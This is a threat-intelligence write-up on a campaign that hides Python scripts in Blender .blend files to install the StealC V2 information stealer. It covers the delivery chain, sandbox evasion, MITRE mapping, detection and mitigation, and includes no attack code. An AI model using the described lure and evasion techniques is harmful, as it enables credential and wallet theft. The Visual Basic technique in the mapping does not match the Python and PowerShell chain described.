Full Report
Cybersecurity researchers have disclosed details of a new campaign that has leveraged Blender Foundation files to deliver an information stealer known as StealC V2. "This ongoing operation, active for at least six months, involves implanting malicious .blend files on platforms like CGTrader," Morphisec researcher Shmuel Uzan said in a report shared with The Hacker News. "Users unknowingly
Analysis Summary
# Tool/Technique: StealC V2 via Malicious .blend Files
## Overview
StealC V2 is a new version of an information stealer malware deployed in an ongoing campaign that exploits the functionality of Blender Foundation (.blend) files. Attackers upload poisoned 3D asset files to sharing platforms, relying on users to enable the "Auto Run" feature in Blender to execute embedded malicious Python scripts, leading to data exfiltration.
## Technical Details
- Type: Malware family (Information Stealer, V2 variant)
- Platform: Windows (implied by PowerShell usage, loading payloads onto compromised hosts)
- Capabilities: Information gathering from browsers, extensions, cryptocurrency wallets, messaging apps, VPNs, and email clients.
- First Seen: Operation active for at least six months prior to disclosure (late 2025). StealC V2 variant announced in late April 2025.
## MITRE ATT&CK Mapping
- TA0009 - Collection
- T1005 - Data from Local System
- T1555 - Credentials from Password Stores (Implied, based on targeting password stores/browsers)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.005 - Command and Scripting Interpreter: Visual Basic
- T1204.002 - User Execution: Malicious File
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (Implied by layered download process)
## Functionality
### Core Capabilities
- **Initial Vector:** Exploitation of Python script embedding within `.blend` files (specifically targeting the execution of `Rig_Ui.py` when "Auto Run" is enabled in Blender).
- **Staging/Execution:** Upon opening the malicious file, an embedded Python script executes, which subsequently fetches a PowerShell script.
- **Payload Delivery:** The PowerShell script downloads two ZIP archives containing the StealC V2 payload and a secondary Python-based stealer.
### Advanced Features
- **Broad Data Harvesting:** StealC V2 specifically supports gathering data from 23 browsers, 100 web plugins and extensions, 15 cryptocurrency wallet apps, messaging services, VPNs, and email clients.
- **Evasion:** The use of Blender running on physical machines with GPUs helps in bypassing sandboxes and virtual environments.
- **Secondary Payload:** Deployment of a secondary Python-based stealer alongside the main StealC V2 payload.
## Indicators of Compromise
- File Hashes: Not provided in the context.
- File Names: `Rig_Ui.py` (embedded script name).
- Registry Keys: Not provided in the context.
- Network Indicators: Not explicitly provided, but involves downloading resources via PowerShell to acquire zipped payloads (C2 communication is implied but details are absent).
- Behavioral Indicators: Automatic execution of embedded Python scripts within Blender when opening `.blend` files with Auto Run enabled. Subsequent execution of PowerShell scripts for downloading external archives.
## Associated Threat Actors
- Similarities noted with a prior campaign linked to **Russian-speaking threat actors**. (The specific group deploying StealC V2 in this campaign is not explicitly named, only tactical links are drawn).
## Detection Methods
- Signature-based detection: Requires signatures for the StealC V2 binaries and the secondary Python stealer.
- Behavioral detection: Monitoring for the execution of Python scripts (`Rig_Ui.py`) embedded in `.blend` files, especially those that subsequently invoke PowerShell or attempt to write files from ZIP archives.
- YARA rules: Not provided in the context.
## Mitigation Strategies
- **Disable Auto Run:** Keep the "Auto Run" option disabled in Blender unless the file source is explicitly trusted, as this prevents the execution of embedded scripts upon opening `.blend` files.
- **Source Trust:** Only open 3D model files from verified and trusted sources.
- **Limit Execution Context:** General practice to avoid running potentially untrusted scripts in environments that mirror production or highly sensitive systems.
## Related Tools/Techniques
- StealC (Original variant)
- Pyramid C2 (Associated with the previously linked campaign)
- Use of decoy documents/files to lure users into executing code (General tactic).